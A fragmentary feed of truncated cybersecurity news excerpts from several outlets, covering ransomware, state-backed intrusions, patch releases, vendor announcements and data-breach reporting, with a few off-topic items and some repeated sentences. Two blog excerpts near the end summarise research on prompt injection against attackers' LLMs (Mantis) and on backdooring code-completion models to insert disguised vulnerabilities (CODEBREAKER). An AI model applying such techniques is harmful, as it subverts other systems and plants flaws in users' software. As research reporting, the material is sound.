Cybersecurity researchers have shed light on a Linux variant of a relatively new ransomware strain called Helldown, suggesting that the threat actors are broadening their attack focus.

"Helldown deploys Windows ransomware derived from the LockBit 3.0 code," Sekoia said in a report shared with The Hacker News.

Helldown was first publicly documented by Halcyon in mid-August 2024, describing it as an "aggressive ransomware group" that infiltrates target networks by exploiting security vulnerabilities.

Like other ransomware crews, Helldown is known for leveraging data leak sites to pressure victims into paying ransoms by threatening to publish stolen data, a tactic known as double extortion.

"W…

U.S. telecoms giant T-Mobile has confirmed that it was also among the companies that were targeted by Chinese threat actors to gain access to valuable information.

The adversaries, tracked as Salt Typhoon, breached the company as part of a "monthslong campaign" designed to harvest cellphone communications of "high-value intelligence targets."

Salt Typhoon, which is also known as Earth Estries, FamousSparrow, GhostEmperor, and UNC2286, is said to have been active since at least 2020, according to Trend Micro.

The cybersecurity company said it observed two distinct attack chains employed by the group, indicating the tradecraft that Salt Typhoon has in its arsenal is broad as it's varied.

By u…

Now-patched security flaws impacting Progress Kemp LoadMaster and VMware vCenter Server have come under active exploitation in the wild, it has emerged.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added CVE-2024-1212 (CVSS score: 10.0), a maximum-severity security vulnerability in Progress Kemp LoadMaster to its Known Exploited Vulnerabilities (KEV) catalog.

"Progress Kemp LoadMaster contains an OS command injection vulnerability that allows an unauthenticated, remote attacker to access the system through the LoadMaster management interface, enabling arbitrary system command execution," the agency said.

CISA's addition of CVE-2024-1212 coincides with a warning…

Cybersecurity researchers have shed light on a new stealthy malware loader called BabbleLoader that has been observed in the wild delivering information stealer families such as WhiteSnake and Meduza.

This is evidenced in the steady stream of new loader families that have emerged in recent years.

"Each build of the loader will have unique strings, unique metadata, unique code, unique hashes, unique encryption, and a unique control flow," Robinson said.

The loader, at its core, is responsible for loading shellcode that then paves the way for decrypted code, a Donut loader, which, in turn, unpacks and executes the stealer malware.

The cybersecurity company said it "spotted new versions being …

To limit any possible confusion, we will use the following terms consistently throughout the text: RedLine malware : The RedLine Stealer malware or a sample thereof.

RedLine backend : Collection of modules that provide authentication and functionality for the RedLine panel.

This includes the RedLine malware, the RedLine panel, and the RedLine backend modules.

This includes the RedLine malware, the RedLine panel, and the RedLine backend modules.

Builder tab of the RedLine panelRedLine backendThe RedLine backend we analyzed in 2023 consists of two modules.

ESET APT Activity Report Q2 2024–Q3 2024 summarizes notable activities of selected advanced persistent threat (APT) groups that were documented by ESET researchers from April 2024 until the end of September 2024.

Additionally, China-aligned APT groups have been relying increasingly on the open-source and multiplatform SoftEther VPN to maintain access to victims’ networks.

For the first time, we saw an APT group – specifically ScarCruft – abusing Zoho cloud services.

Malicious activities described in ESET APT Activity Report Q2 2024–Q3 2024 are detected by ESET products; shared intelligence is based mostly on proprietary ESET telemetry data and has been verified by ESET researchers.

Attack s…

The trailblazing scientist shares her reasons for hope in the fight against climate change and how we can tackle seemingly impossible problems and keep going in the face of adversityRenowned ethologist and conservationist Jane Goodall offers a sobering, but hopeful reflection on the precarious state of our planet.

With ecosystems worldwide facing unprecedented threats from climate change, biodiversity loss, intensive farming, deforestation, and pollution, Earth is undergoing what scientists call the sixth mass extinction.

Unlike in the past, however, this one is driven by human activity, accelerating species loss at rates much faster than typical evolutionary processes.

Yet, Ms. Goodall – w…

Each month, ESET's Chief Security Evangelist Tony Anscombe will bring you a roundup of the latest cybersecurity news and insights – all in five or so minutes.

Let's cut to the chase now and review some of the most impactful cybersecurity stories of October 2024.

Recent weeks have also seen a number of damaging hacks and breaches, including one hitting American Water, the largest US water utility, and two incidents targeting The Internet Archive.

Meanwhile, lawmakers have also been busy this month, as Australia introduced its first cybersecurity legislation.

In the US, the Cybersecurity and Infrastructure Security Agency (CISA) proposed new security requirements to protect personal and gover…

If not, consider requesting the removal of your personal information from search results.

What shows up in Google Search?

Unsurprisingly, the search results become more specific, showcasing how powerful search engines are at pinpointing someone’s data.

How to use Google’s “Results about you”To use this feature, you need to have a Google account.

For the browser version, follow these steps:Log into your Google account and click on your profile avatar.

The dark web is thrivingFirst things first: Contrary to popular assumption, the dark web is not illegal and it’s not populated solely by cybercriminals.

Even worse, 700 of these emails had passwords associated with them stored in plain text and exposed on dark web sites.

There are various ways your own data could end up in a dark web forum or site.

If you’re signed up to an identity protection or dark web monitoring service, it should flag any PII or other data it finds on the dark web.

See what’s lurking out there on the dark web right now and it may never get to that stage.

So what's the real story with methane and how exactly do the emissions of this powerful greenhouse gas accelerate climate change?

Increased awareness of methane’s potent warming effect and the urgency of reducing methane emissions have prompted a slew of methane-reducing initiatives.

To get a grip on the problem, however, the world first needs to identify emission sources with pinpoint accuracy.

This is where state-of-the-art satellite technology comes in.

In his talk, the legendary engineer and entrepreneur Tony Fadell talks about MethaneSAT, a pioneering satellite that orbits the planet in order to map and track the sources of methane emissions primarily from oil and gas operations, which…

The CloudScout toolset is capable of retrieving data from various cloud services by leveraging stolen web session cookies.

CloudScout utilizes stolen cookies, provided by MgBot plugins, to access and exfiltrate data stored at various cloud services.

In February 2023, CloudScout modules and the Nightdoor implant were detected at what we suspect is a Taiwanese government entity.

The CloudScout module obtains a new configuration by continuously monitoring its working directory, looking for files with .dat extensions.

This package is stored in the resources section of CloudScout modules and is loaded at the beginning of the ModuleStart function.

Then there are threat actors like CosmicBeetle – they lack the necessary skills set, write crude malware, yet still compromise interesting targets, and achieve “stealth” by using odd, impractical and overcomplicated techniques.

Discussing further with ESET Research Podcast host and Distinguished Researcher Aryeh Goretsky, Jakub shared his view of CosmicBeetle’s encryption routine, information about their victimology, and details of their “involvement” with high-profile gangs such as LockBit and RansomHub.

For details on how this crude and clumsy threat actor, whose malicious tools are “riddled with bugs”, achieved to penetrate any of its targets, listen to this ESET Research Podcast episode…

ESET researchers have discovered new Rust-based tooling leading to the deployment of Embargo ransomware.

C:\Windows\Debug\a.cacheRC4-encrypted Embargo ransomware.

C:\Windows\Debug\pay.exeDecrypted Embargo ransomware.

Tactic ID Name Description Resource Development T1587.001 Develop Capabilities: Malware Embargo group develops its custom toolkit – MDeployer, MS4Killer, and Embargo ransomware.

T1486 Data Encrypted for Impact Embargo ransomware encrypts files on compromised machines.

The classic Google Voice scam goes something like this:Setting up a Google Voice account .

The fraudster downloads the Google voice app and links it to a Google account, much like anyone else does..

The fraudster downloads the Google voice app and links it to a Google account, much like anyone else does.

Then they may do one of several things:Sell your Google Voice number and account to other scammersPlace vishing calls designed to scam victims, using your Google Voice accountEmbed your Google Voice number into email phishing or smishing messagesUse the Google Voice voicemail feature to record messages posing as legitimate authorities, in order to further their scamsUse the Google Voice num…

The rest of the software flaws under review were exploited as n-days; i.e., vulnerabilities first exploited after patches are made available (versus zero days, which are abused before patches are released).

The average time to exploit a software flaw has been shrinking considerably over the years – from 63 days in 2018-2019 all the way to only five days last year.

These and other figures in the report underscore a disconcerting trend: threat actors are rapidly getting better at spotting and weaponizing software vulnerabilities, which clearly poses an escalating threat to businesses and individuals alike.

What else did the report find and how does the market for zero-day exploits factor into…

“Hey, wanna chat?” This innocent phrase can take on a sinister meaning when it comes from an adult to a child online and even be the start of a predatory relationship“Hey, wanna chat?” What sounds like a casual and innocent phrase between adults can take a sinister turn when it comes from an adult to a child online – and even be the start of a predatory relationship.

Grooming, where an adult uses psychological tactics to gain a child’s trust in order to manipulate, exploit, or abuse them, is a pervasive problem these days.

It often occurs online, where predators may use social media, gaming platforms, or messaging apps to contact minorsIn this episode of Unlocked 403, Becks sat down with ch…

Although QR codes have been around since the 90s, quishing as a threat really started to appear during the pandemic.

Fraudsters leapt into action, sticking fake QR codes over the real ones.

There have been a number of reports about scammers targeting motorists via malicious QR codes stuck to parking meters.

If you’re uncomfortable scanning a QR code, consider using one of these alternatives to avoid the risk of interacting with a fraudulent code.

News of the latest QR quishing campaign will only increase calls for codes to be banned from public places.

In this blog, we’ll explore cybersecurity internships, scholarships and apprenticeships as three great pathways, especially for young people, to jump-start their careers in this exciting and rewarding field.

For example, ESET currently runs Women in Cybersecurity scholarships for female undergraduates looking to pursue a career in cybersecurity in the UK , US, Canada and Australia.

Some cybersecurity apprenticeships prepare you for industry certifications that validate the training and expertise learned, enhancing employability further down the line.

Job security: Almost all industries require cybersecurity, including health, government, education, law, financial services, and manufacturing…

GitHub is calling on maintainers of open source projects to apply for the newly opened Secure Open Source Fund, to get funding and knowledge to improve the security and sustainability of their software.

), venture funds (e.g., Mayfield Fund) and nonprofits (e.g., the Alfred P. Sloan Foundation).

“This program is suited for individual maintainers or small teams of open source projects.

Teams that can benefit from education and community to tackle security in a scaled manner are welcome to apply,” GitHub notes.

The first cohort of participants will include 125 maintainers / projects.

Oracle Linux, 9 Update 5 for the 64-bit Intel and AMD (x86_64) and 64-bit Arm (aarch64) platforms is now generally available.

An ism_o profile is introduced for Oracle Linux 9 systems to cover the “Information Security Manual” guidance produced by Australian Cyber Security Center.

Compilers and development toolsSystem Java updated to OpenJDK 17 – The default Oracle Linux 9 Java is changed from OpenJDK 11 to OpenJDK 17.

After this update, the java-17-openjdk packages, which provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit, also provide the java and java-devel packages.

.NET updated to version 9.0 – In this release, .NET is updated to version 9.…

Quantum announces the DXi9200, the latest generation of its flagship DXi9000 Series hybrid (flash + dense disk) data protection appliances, designed for scalable, efficient backup and recovery services for large organizations.

As the industry’s most scalable, feature-rich, and efficient data protection appliance, the DXi9200 meets these challenges head on.

“The DXi9200 is a powerful new solution for strengthening any organization’s cyber resilience,” says Sanam Mittal, VP, DXi.

The DXi9200 strengthens every customer’s cyber resilience to protect against cyberattacks with a hardened architecture consistent with the NIST Cybersecurity Framework 2.0 (CSF 2.0) designed to help organizations to …

Apple has released emergency security updates for macOS Sequoia that fix two zero-day vulnerabilities (CVE-2024-44309, CVE-2024-44308) that “may have been actively exploited on Intel-based Mac systems”.

CVE-2024-44308 affects JavaScriptCore – the built-in JavaScript engine for WebKit – and can likewise be exploited via maliciously crafted web content.

As per usual, Apple didn’t share details about the attacks in which patched vulnerabilities are exploited.

Still, it’s safe to say that the spotted attacks aren’t indiscriminately targeting all Mac users, but are leveraging the flaws for targeted attacks.

In any case, all MacOS Sequoia users should update their systems as soon as possible.

ArmorCode announced the growth of its ASPM Platform with the ability to unify AppSec and infrastructure vulnerability management.

The ArmorCode Platform helps teams overcome these challenges by providing unified, comprehensive visibility, streamlining workflows, and by delivering faster, more efficient vulnerability management with AI-powered automation.

To further streamline vulnerability management, the ArmorCode Platform elevates infrastructure and cloud assets as first-class citizens within the RBVM process.

Key RBVM + ASPM differentiators include:Unified vulnerability management: The only platform that truly integrates vulnerability management across infrastructure, cloud, containers, …

Tanium announced Tanium Cloud Workloads, providing real-time visibility and protection for containerized environments.

As the adoption of containerized workloads increases across organizations, so does the attack surface available to bad actors exploiting their vulnerabilities.

As part of the Tanium platform, Tanium Cloud Workloads reduces the risks associated with container deployments by identifying vulnerabilities and configuration issues in container images before they reach deployment.

Furthermore, container inventory and analysis capabilities included in Tanium Cloud Workloads provide visibility across clusters and nodes, enabling identification of rogue containers, which can pose sig…

OpenText unveiled Cloud Editions (CE) 24.4, presenting a suite of transformative advancements in Business Cloud, AI, and Technology to empower the future of AI-driven knowledge work.

“OpenText Cloud Editions 24.4 is purpose-built to empower today’s knowledge-driven workforce by blending AI with secure, seamless data connectivity,” said Muhi Majzoub, EVP and CPO at OpenText.

OpenText Business Cloud solutions empower everyone—from engineers to IT teams—with integrated, secure technology that drives significant simplification and efficiency.

OpenText Customer Data and OpenText Core Journey better offers expanded unified customer data management capabilities, including preference management wit…

With its open architecture the Exabeam New-Scale Security Operations Platform supports a best-of-breed ecosystem that includes hundreds of product integrations to accelerate time-to-value and strengthen on-premises and cloud security.

“By uniting cutting-edge cloud security intelligence from Wiz with AI-powered analytics from Exabeam, we are transforming how security teams defend against evolving threats.

With the Wiz integration, customers will experience enhanced cloud security insights and streamlined onboarding to the Exabeam New-Scale Platform.

: By connecting Wiz’s cloud insights with data from other security tools, the Exabeam New-Scale Platform offers a unified view for investigatio…

Arkose Labs launched Arkose Device ID, a device identification solution that raises the bar in fraud detection by combining precise device tracking with session-based risk signals and anti-spoofing technology.

Arkose Device ID is designed to address the growing sophistication of cyber threats, which are impacting businesses globally with increasing frequency and intensity.

“Arkose Device ID goes beyond traditional device fingerprinting,” said Vikas Shetty, head of product at Arkose Labs.

Arkose Device ID helps prevent fraud before it can escalate and provides a seamless experience for legitimate users.”Arkose Device ID stands out with its unique combination of stateless and stateful identif…

The Growing Cybersecurity Skills GapThe cybersecurity landscape is more complex and dangerous than ever before.

Immigration: A Solution to the Cybersecurity ShortageImmigration can help solve the cybersecurity skills shortage in several ways.

Although immigration was highlighted as a crucial element in the policy to mitigate the cybersecurity talent shortage, meaningful immigration reform by Congress is essential for the successful implementation of this strategy.

These experts can help train the next generation of American cybersecurity professionals, ensuring that the U.S. remains at the forefront of global cybersecurity for decades to come.

ConclusionThe cybersecurity skills shortage is …

Cybereason has launched its revolutionary SDR Data Ramp Programme with Observe.

This ensures that customers can experience the full capabilities of Cybereason’s SDR product, which is designed to detect, analyse, and respond to cyber threats with unparalleled accuracy and speed, reducing the need for legacy SIEM platforms.

“The 1TB Free SDR Data Ramp Programme underscores our commitment to empowering organisations with the tools they need to defend against increasingly sophisticated cyber threats.

This multi-layered approach enables security teams to identify and mitigate threats more effectively, reducing the time to detect and respond to incidents.

To learn more about Cybereason’s 1TB Free…

Even seasoned professionals stumble upon common pitfalls that can impact user experience and, consequently, a site’s success.

With expertise from website design company, Full Stack Industries, we will explore common design mistakes and how to avoid them.

This inclusive step means all audiences can experience your site and will also improve your search engine rankings.

Final ThoughtsKeeping these common website design mistakes at bay can significantly elevate your online presence.

By prioritising user experience, accessibility, and clear communication, you’ll create a site that looks great and effectively serves its users.

Encrypting a few devices to test their strategy is a red flag that a more significant ransomware assault is imminent and demands immediate action.

By staying alert to these signs and responding promptly, organisations can better defend against the escalating threat of ransomware attacks.

Poorly Managed Remote Desktop Protocol ConnectionsRemote Desktop Protocol (RDP) connections, if not properly managed, can be an entry point for ransomware attacks.

Sectors Prone to Ransomware AttacksSpecific sectors are particularly vulnerable to ransomware attacks thanks to the critical nature of their operations.

Here are the sectors most commonly targeted:The healthcare sector is a prime target for ranso…

Databarracks’ Data Health Check – an annual survey of 500 UK IT decision makers – found that while more organisations than ever have cyber insurance, the number of claims is down.

66% of those surveyed report having insurance specifically for cyber in 2024, rising from 51% over the past two years.

James Watts, Managing Director at Databarracks, commented:“We have long speculated about the negative effect of cyber insurance policies on ransomware.

The nascent cyber insurance market suddenly became unsustainable.

As our Data Health Check found last year, cyber insurance prices increased significantly and the requirements to obtain cover became stricter.

According to research from Absolute Security, over half (54%) of Chief Information Security Officers (CISOs) feel their security team is unprepared for evolving AI-powered threats.

The findings were uncovered in the Absolute Security United Kingdom CISO Cyber Resilience Report 2024, which surveyed 250 UK CISOs at enterprise organisations to assess the state of cyber resilience, AI, and the cyber threat landscape in the UK.

Almost half (46%) of CISOs believe that AI is more of a threat to their organisation’s cyber resilience than a help, highlighting AI as a potential danger in safeguarding organisations from cyber threats rather than strengthening cyber resilience.

As AI-driven cyber threa…

The report found that threat actors are selling data and source code from major brands on the dark web.

Given the popularity of Amazon, users should be wary of threat actors creating counterfeit websites that ask to submit sensitive information.

Log4j remains a popular vulnerability that threat actors attempt to exploitThree years after its discovery in 2021, Log4j remains one of the most used vulnerabilities leveraged by threat actors.

Inbound traffic is traffic that doesn’t originate from within the network, while WANbound traffic resides within a WAN environment.

“With the Q2 2024 Cato CTRL SASE Threat Report, we are putting the spotlight on a notorious threat actor named IntelBroker.

The National Institute of Standards and Technology (NIST) has officially published its highly anticipated Federal Information Processing Standards (FIPS) for post-quantum cryptography (PQC).

The algorithms announced today represent the first finalized standards from NIST’s PQC standardization project and are now ready for immediate implementation.

Today’s announcement takes place within a larger regulatory framework, including the White House’s National Security Memorandum, NSM-8, which requires the adoption of post-quantum cryptography (PQC).

Today’s quantum computers are small and experimental, but they are rapidly becoming more capable, and it is only a matter of time before cryptographi…

Yet despite the clear and present danger, some businesses continue to deprioritise cyber security, with a concerning 15% failing to invest in cyber security measures.

An overshadowed priorityDespite a shared understanding of cyber threats among security leaders and C-suite, cyber security often gets overlooked.

Alarmingly, a third of security leaders only prioritise cyber security expertise after an attack has happened.

Securing buy-inTo ensure cyber security is prioritised, it is vital to convey to the C-suite the very real implications of not mitigating cyber security risks.

It is time to implement cyber security measures nowBy deprioritising cyber security, businesses are essentially def…

High levels of demand for cyber security expertise also means that it’s one of the best paying roles in tech with a great level of job security.

However, cyber security professionals are in a never-ending arms race with hackers.

On the other side, AI also has the capacity to create an arsenal of new offensive and defensive tools for cyber security experts.

Quantum computingLike AI, Quantum has the capacity to utterly transform how we all live and work.

Ambitious cyber security professionals could become trail blazers in this sector if they start acquiring relevant skills now.

HealthEquity, a leading provider of health savings account (HSA) services, has announced it suffered a data breach recently, resulting in compromised customer protected health information (PHI). It is understood the breach was detected on March 25, 2024, after abnormal activity was flagged from a business partner’s device. Once an investigation was carried out, it was […]

The post HealthEquity Data Breach Compromises Customer Information first appeared on IT Security Guru.

The post HealthEquity Data Breach Compromises Customer Information appeared first on IT Security Guru.

Today, Accenture (NYSE: ACN) and SandboxAQ have announced that they are expanding their partnership to address the critical need for enterprise data encryption that can defend against current data breaches, as well as future AI and quantum threats. Together, Accenture and SandboxAQ are helping organisations secure sensitive data and strengthen encryption across their technology portfolios. […]

The post Accenture and SandboxAQ Expand Cybersecurity Partnership first appeared on IT Security Guru.

The post Accenture and SandboxAQ Expand Cybersecurity Partnership appeared first on IT Security Guru.

New research by Keeper Security has revealed some worrying trends and misunderstandings when it comes to password best practices and overconfidence in cyber knowledge. The research found that, while 85% of respondents believe their passwords are secure, over half admit to sharing their passwords. Additionally, 64% of people feel confident in their cybersecurity knowledge despite […]

The post People Overconfident in Password Habits, Overwhelmed by Too Many Passwords first appeared on IT Security Guru.

The post People Overconfident in Password Habits, Overwhelmed by Too Many Passwords appeared first on IT Security Guru.

Technology is advancing rapidly and tokenized payment cards are a part of its evolution. Gone are the days of keying in long card numbers, expiry dates and CVV codes and hoping for the best. Instead, tokenized cards offer heightened security and improved transaction processes for digital payments. But what are they all about and how […]

The post Secure, Simple, Superior: The Advantages of Tokenized Payment Cards by Wallester first appeared on IT Security Guru.

The post Secure, Simple, Superior: The Advantages of Tokenized Payment Cards by Wallester appeared first on IT Security Guru.

New threat research by Salt-Labs, the research arm of API security company Salt Security, has released new research highlighting critical security flaws within popular web analytics provider Hotjar. The company serves over one million websites, including global brands like Microsoft and Nintendo (according to their website). These vulnerabilities could have potentially allowed an attacker unlimited […]

The post Security Flaws Found in Hotjar, Potentially Affecting Sensitive Data of Millions Utilising Major Global Brands first appeared on IT Security Guru.

The post Security Flaws Found in Hotjar, Potentially Affecting Sensitive Data of Millions Utilising Major Global Brands appeared first on…

Interesting analysis:Although much attention is given to sophisticated, zero-click spyware developed by companies like Israel’s NSO Group, the Italian spyware marketplace has been able to operate relatively under the radar by specializing in cheaper tools.

According to an Italian Ministry of Justice document, as of December 2022 law enforcement in the country could rent spyware for €150 a day, regardless of which vendor they used, and without the large acquisition costs which would normally be prohibitive.

As a result, thousands of spyware operations have been carried out by Italian authorities in recent years, according to a report from Riccardo Coluccini, a respected Italian journalist wh…

Zero-day vulnerabilities are more commonly used, according to the Five Eyes:Key FindingsIn 2023, malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks compared to 2022, allowing them to conduct cyber operations against higher-priority targets.

In 2023, the majority of the most frequently exploited vulnerabilities were initially exploited as a zero-day, which is an increase from 2022, when less than half of the top exploited vulnerabilities were exploited as a zero-day.

Malicious cyber actors continue to have the most success exploiting vulnerabilities within two years after public disclosure of the vulnerability.

The utility of these vulnerabilitie…

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

Their work was a big step forward, if not for two mistakes that would impede future progress in improving passwords for decades.

First, was Morris and Thompson’s confidence that their solution, a password policy, would fix the underlying problem of weak passwords.

The user is warned of the risks and if he cooperates, he is very safe indeed.

Morris and Thompson assumed their intervention would be effective without testing its efficacy, considering its unintended consequences, or even defining a metric of success to test against.

Not only did their hunch turn out to be wrong, but their second mistake prevented anyone from proving them wrong.

New iOS Security Feature Makes It Harder for Police to Unlock Seized PhonesEverybody is reporting about a new security iPhone security feature with iOS 18: if the phone hasn’t been used for a few days, it automatically goes into its “Before First Unlock” state and has to be rebooted.

This is a really good security feature.

But various police departments don’t like it, because it makes it harder for them to unlock suspects’ phones.

Posted on November 14, 2024 at 7:05 AM • 0 Comments

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

Criminals Exploiting FBI Emergency Data RequestsI’ve been writing about the problem with lawful-access backdoors in encryption for decades now: that as soon as you create a mechanism for law enforcement to bypass encryption, the bad guys will use it too.

Turns out the same thing is true for non-technical backdoors:The advisory said that the cybercriminals were successful in masquerading as law enforcement by using compromised police accounts to send emails to companies requesting user data.

In some cases, the requests cited false threats, like claims of human trafficking and, in one case, that an individual would “suffer greatly or die” unless the company in question returns the requested i…

Friday Squid Blogging: Squid-A-Rama in Des MoinesSquid-A-Rama will be in Des Moines at the end of the month.

Visitors will be able to dissect squid, explore fascinating facts about the species, and witness a live squid release conducted by local divers.

How are they doing a live squid release?

Simple: this is Des Moines, Washington; not Des Moines, Iowa.

Posted on November 8, 2024 at 5:04 PM •

AI Industry is Trying to Subvert the Definition of “Open Source AI”The Open Source Initiative has published (news article here) its definition of “open source AI,” and it’s terrible.

And it’s confusing; most “open source” AI models—like LLAMA—are open source in name only.

But while open source should mean open source, there are some partially open models that need some sort of definition.

Because we want Open Source AI to exist also in fields where data cannot be legally shared, for example medical AI.

How about we call this “open weights” and not open source?

Interesting research: “Hacking Back the AI-Hacker: Prompt Injection as a Defense Against LLM-driven Cyberattacks“:Large language models (LLMs) are increasingly being harnessed to automate cyberattacks, making sophisticated exploits more accessible and scalable.

In response, we propose a new defense strategy tailored to counter LLM-driven cyberattacks.

We introduce Mantis, a defensive framework that exploits LLMs’ susceptibility to adversarial inputs to undermine malicious operations.

Upon detecting an automated cyberattack, Mantis plants carefully crafted inputs into system responses, leading the attacker’s LLM to disrupt their own operations (passive defense) or even compromise the attacke…

Really interesting research: “An LLM-Assisted Easy-to-Trigger Backdoor Attack on Code Completion Models: Injecting Disguised Vulnerabilities against Strong Detection“:Abstract: Large Language Models (LLMs) have transformed code com-pletion tasks, providing context-based suggestions to boost developer productivity in software engineering.

As users often fine-tune these models for specific applications, poisoning and backdoor attacks can covertly alter the model outputs.

To address this critical security challenge, we introduce CODEBREAKER, a pioneering LLM-assisted backdoor attack framework on code completion models.

Our extensive experimental evaluations and user studies underline the stron…

Microsoft is warning Azure cloud users that a Chinese controlled botnet is engaging in “highly evasive” password spraying.

Not sure about the “highly evasive” part; the techniques seem basically what you get in a distributed password-guessing attack:“Any threat actor using the CovertNetwork-1658 infrastructure could conduct password spraying campaigns at a larger scale and greatly increase the likelihood of successful credential compromise and initial access to multiple organizations in a short amount of time,” Microsoft officials wrote.

“This scale, combined with quick operational turnover of compromised credentials between CovertNetwork-1658 and Chinese threat actors, allows for the poten…

AIs Discovering VulnerabilitiesI’ve been writing about the possibility of AIs automatically discovering code vulnerabilities since at least 2018.

This is an ongoing area of research: AIs doing source code scanning, AIs finding zero-days in the wild, and everything in between.

Imagine that we have an AI that finds software vulnerabilities.

But the defenders can use the same AIs to find software vulnerabilities and then patch them.

And, eventually, those software vulnerabilities will be a thing of the past.

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

The financial technology firm Finastra is investigating the alleged large-scale theft of information from its internal file transfer platform, KrebsOnSecurity has learned.

On November 8, 2024, Finastra notified financial institution customers that on Nov. 7 its security team detected suspicious activity on Finastra’s internally hosted file transfer platform.

Finastra also told customers that someone had begun selling large volumes of files allegedly stolen from its systems.

“There is no direct impact on customer operations, our customers’ systems, or Finastra’s ability to serve our customers currently,” the notice continued.

However, it did reference many of the same banks called out as Fin…

Mr. Shefel, who recently changed his legal surname to Lenin, was the star of last year’s story, Ten Years Later, New Clues in the Target Breach.

Mr. Golubov could not be reached for comment, and Shefel says he no longer has the laptop containing evidence to support that claim.

“My nickname was MikeMike, and I worked with Dmitri Golubov and made technologies for him,” Shefel said.

“Helkern was my friend, I [set up a] meeting with Golubov and him in 2013,” Shefel said.

Incredibly, the day after our initial interview via Telegram, Shefel proposed going into business together.

Microsoft today released updates to plug at least 89 security holes in its Windows operating systems and other software.

The zero-day flaw tracked as CVE-2024-49039 is a bug in the Windows Task Scheduler that allows an attacker to increase their privileges on a Windows machine.

The two other publicly disclosed weaknesses Microsoft patched this month are CVE-2024-49019, an elevation of privilege flaw in Active Directory Certificate Services (AD CS); and CVE-2024-49040, a spoofing vulnerability in Microsoft Exchange Server.

For a more detailed breakdown of today’s patches from Microsoft, check out the SANS Internet Storm Center’s list.

For administrators in charge of managing larger Windows e…

In some cases, a cybercriminal will offer to forge a court-approved subpoena and send that through a hacked police or government email account.

But increasingly, thieves are relying on fake EDRs, which allow investigators to attest that people will be bodily harmed or killed unless a request for account data is granted expeditiously.

“Unlimited Emergency Data Requests.

Donahue said even if one customer gets a fake request, Kodex is able to prevent the same thing from happening to another.

“A lot of global police agencies don’t have stringent cybersecurity hygiene, but even U.S. dot-gov emails get hacked.

A 26-year-old man in Ontario, Canada has been arrested for allegedly stealing data from and extorting more than 160 companies that used the cloud data service Snowflake.

All told, more than 160 Snowflake customers were relieved of data, including TicketMaster, Lending Tree, Advance Auto Parts and Neiman Marcus.

On May 2, 2024, Judische claimed on the fraud-focused Telegram channel Star Chat that they had hacked Santander Bank, one of the first known Snowflake victims.

TELECOM DOMINOESMandiant has attributed the Snowflake compromises to a group it calls “UNC5537,” with members based in North America and Turkey.

“I’m not really someone that sells data unless it’s crypto [databases] or credit …

This story examines a recent spear-phishing campaign that ensued when a California hotel had its booking.com credentials stolen.

In November 2023, the security firm SecureWorks detailed how scammers targeted booking.com hospitality partners with data-stealing malware.

This seller claims to help people monetize hacked booking.com partners, apparently by using the stolen credentials to set up fraudulent listings.

A service advertised on the English-language crime community BreachForums in October courts phishers who may need help with certain aspects of their phishing campaigns targeting booking.com partners.

But that change came only after thieves used stolen credentials to siphon data from …

A few days after BlackCat imploded, the same stolen healthcare data was offered for sale by a competing ransomware affiliate group called RansomHub.

“Change Health and United Health processing of sensitive data for all of these companies is just something unbelievable.

For most US individuals out there doubting us, we probably have your personal data.”It remains unclear if RansomHub ever sold the stolen healthcare data.

This process is now free for all Americans, and simply blocks potential creditors from viewing your credit file.

If you haven’t done so in a while, now would be an excellent time to review your credit file for any mischief or errors.

The result is that there are a number of marketing companies that now enrich and broker access to this mobile location information.

What accounts for the disparity between the number of Android and Apple devices that can be found in mobile advertising data?

Google said its MAIDs are randomly generated and do not contain IP addresses, GPS coordinates, or any other location data, and that its ad systems do not share anyone’s precise location data.

Georgetown Law’s Justin Sherman said the data broker and mobile ad industries claim there are protections in place to anonymize mobile location data and restrict access to it, and that there are limits to the kinds of invasive inferences one can mak…

More recently, USDoD was behind a breach at the consumer data broker National Public Data that led to the leak of Social Security numbers and other personal information for a significant portion of the U.S. population.

According to TV Globo, USDoD is wanted domestically in connection with the theft of data on Brazilian Federal Police officers.

Additional reporting revealed National Public Data had inadvertently published its own passwords on the Internet.

In an interview with KrebsOnSecurity, USDoD acknowledged stealing the NPD data earlier this year, but claimed he was not involved in leaking or selling it.

Toward the end of that interview, USDoD said they were planning to launch a platfor…

The U.S. government on Wednesday announced the arrest and charging of two Sudanese brothers accused of running Anonymous Sudan (a.k.a.

AnonSudan), a cybercrime business known for launching powerful distributed denial-of-service (DDoS) attacks against a range of targets, including dozens of hospitals, news websites and cloud providers.

Active since at least January 2023, AnonSudan has been described in media reports as a “hacktivist” group motivated by ideological causes.

AnonSudan claimed credit for successful DDoS attacks on numerous U.S. companies, causing a multi-day outage for Microsoft’s cloud services in June 2023.

The two men also allegedly extorted some of their victims for money in…

The parents of a 19-year-old Connecticut honors student accused of taking part in a $243 million cryptocurrency heist in August were carjacked a week later — while out house-hunting in a brand new Lamborghini.

But prosecutors in Connecticut said they were targeted “because the co-conspirators believed the victims’ son had access to significant amounts of digital currency.”What made the Miami men so convinced R.C.

One of the usernames leaked during the chat was Veer Chetal.

KrebsOnSecurity sought comment from Veer Chetal, and from his parents — Radhika Chetal and Suchil Chetal.

It is clear that other alleged co-conspirators to the $243 million heist displayed a conspicuous consumption of wea…

Microsoft today released security updates to fix at least 117 security holes in Windows computers and other software, including two vulnerabilities that are already seeing active attacks.

Also, Adobe plugged 52 security holes across a range of products, and Apple has addressed a bug in its new macOS 15 “Sequoia” update that broke many cybersecurity tools.

One of the zero-day flaws — CVE-2024-43573 — stems from a security weakness in MSHTML, the proprietary engine of Microsoft’s Internet Explorer web browser.

Finally, Adobe has released security updates to plug a total of 52 vulnerabilities in a range of software, including Adobe Substance 3D Painter, Commerce, Dimension, Animate, Lightroom,…
